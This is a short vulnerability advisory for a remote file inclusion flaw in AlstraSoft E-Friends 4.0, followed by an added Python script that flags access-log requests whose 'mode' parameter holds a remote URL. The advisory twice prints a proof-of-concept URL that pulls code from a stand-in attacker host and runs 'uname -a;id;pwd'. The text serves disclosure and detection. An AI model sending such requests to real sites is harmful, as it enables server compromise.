AlstraSoft E-Friends "mode" File Inclusion Vulnerability
Vulnerable: AlstraSoft E-Friends 4.0
AlstraSoft E-Friends is affected by a remote file include vulnerability.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
AlstraSoft E-Friends 4.0 is reported to be affected. Other versions may be vulnerable as well.
Vulnerable: http://www.example.com/index.php?mode=http://evilcode?&cmd=uname -a;id;pwd
Reference
http://www.securityfocus.com/bid/14932
On 09/22/2005, members of Kurdish Hackers Clan identified a remote code execution vulnerability in AlstraSoft's friendship script.
The vulnerability allows the script to be accessed remotely.
http://www.site.com/index.php?mode=http://evilcode?&cmd=uname -a;id;pwd
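As an added example (not part of the original advisory or of AlstraSoft's code), the following check scans web server access logs for requests in which the "mode" parameter carries an absolute remote URL, the request shape shown above. It assumes Combined Log Format; the log lines are constructed, and the mode values "login" and "join" are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request part of a Combined Log Format line (the format is an assumption).
REQUEST = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A page-selector parameter should never carry an absolute remote URL.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)


def find_remote_includes(lines, param="mode"):
    """Return one record per request whose `param` value is a remote URL."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we can parse
        query = m["target"].partition("?")[2]
        for key, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double encoding.
            value = unquote(value)
            if key.lower() == param and REMOTE_URL.match(value):
                hits.append({"line": lineno, "ip": m["ip"],
                             "status": int(m["status"]), "value": value})
    return hits


# Constructed sample log: documentation-range addresses, hypothetical
# benign mode values, and the request shape quoted in the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Sep/2005:10:00:01 +0000] '
    '"GET /index.php?mode=login HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Sep/2005:10:00:05 +0000] '
    '"GET /index.php?mode=http://evilcode?&cmd=uname%20-a;id;pwd HTTP/1.1" 200 312',
    '192.0.2.11 - - [22/Sep/2005:10:00:09 +0000] '
    '"GET /index.php?mode=join&ref=http://www.example.org/ HTTP/1.1" 200 4801',
    '198.51.100.7 - - [22/Sep/2005:10:00:12 +0000] '
    '"GET /index.php?mode=http%3A%2F%2Fevilcode%3F HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print(hit)
```

A hit records an attempt, not a successful include; the response status alone does not tell the two apart.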
